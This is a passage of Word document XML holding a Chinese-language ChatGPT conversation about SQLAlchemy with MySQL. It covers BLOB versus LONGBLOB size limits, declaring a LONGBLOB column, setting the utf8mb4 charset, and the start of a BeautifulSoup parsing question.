      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的字符串应该可以被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> eval() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新创建对象，但实际上这并非必须。根据实际需要，有时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __repr__() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以返回一个更易于人类理解的字符串表示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33226588" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499DEFEB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LargeBinary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的数据表字段不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>longblob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。告诉我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储的最大容量，和如何生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>longblob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B09D839" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B8D1FB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745C6AC3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BLOB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型可以存储最大为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 65535</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>64KB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）字节的数据，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LONGBLOB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型可以存储最大为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4294967295</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（约</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4GB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）字节的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1878C037" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B72BDBE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlalchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来说，如果你想要创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LONGBLOB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的字段，你可以直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlalchemy.dialects.mysql.LONGBLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。以下是一个示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE611F8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344C18F5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66663BE1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy import Column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B140E83" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy.dialects.mysql import LONGBLOB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7DA762" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E8B34BE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class YourClass(Base):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D732435" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    __tablename__ = 'your_table'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3540CE29" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    id = Column(Integer, primary_key=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1231CA9F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    data = Column(LONGBLOB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B36F36E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2625893F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库中将会被创建为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LONGBLOB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090EF7E7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E490D5F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请确保你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方言，否则你可能需要升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者安装相应的库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7392AEAE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4439C0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlalchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建表指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D68745C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B44BFB1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277AD413" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建表时，你可以在创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> engine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候，通过在数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> charset=utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来指定字符集。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E26B086" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4ED36F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411F920" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy import create_engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F3C7B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42101E43" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>engine = create_engine('mysql+pymysql://user:password@localhost/database?charset=utf8mb4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F65D99C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015A3DBF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意在这里，我使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql+pymysql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不仅仅是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要一个数据库连接器（或者说驱动）来和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库进行通信，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pymysql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是其中一个常用的连接器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF7677" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C70A845" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，如果你想在特定的表或者字段级别上指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符集，你需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __table_args__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性。这里是一个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F439CF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5A6C66" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FD79B7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>from sqlalchemy import Table, MetaData, Column, Integer, String, create_engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E335AA5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63291467" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>metadata = MetaData()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A00908E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B668F5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>table = Table('atable', metadata,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE562E2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Column('id', Integer, primary_key=True),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0F56CF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Column('name', String(100)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508233D1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mysql_charset='utf8mb4'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0AB311" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B845A5B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8B4454" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>engine = create_engine('mysql+pymysql://user:password@localhost/database')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC91A51" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>metadata.create_all(engine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A035A10" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA2D9FA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">atable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表以及它的所有字段都将使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符集。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B910E35" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DADE8B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def bs4html(bs4_html):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75986BC9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736BF06F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    soup = BeautifulSoup(bs4_html, 'html.parser')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF3BA41" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D00B1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        table = Table(soup.title.text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是啥意思</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A505F2B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385FB86F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B333C8F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一段使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
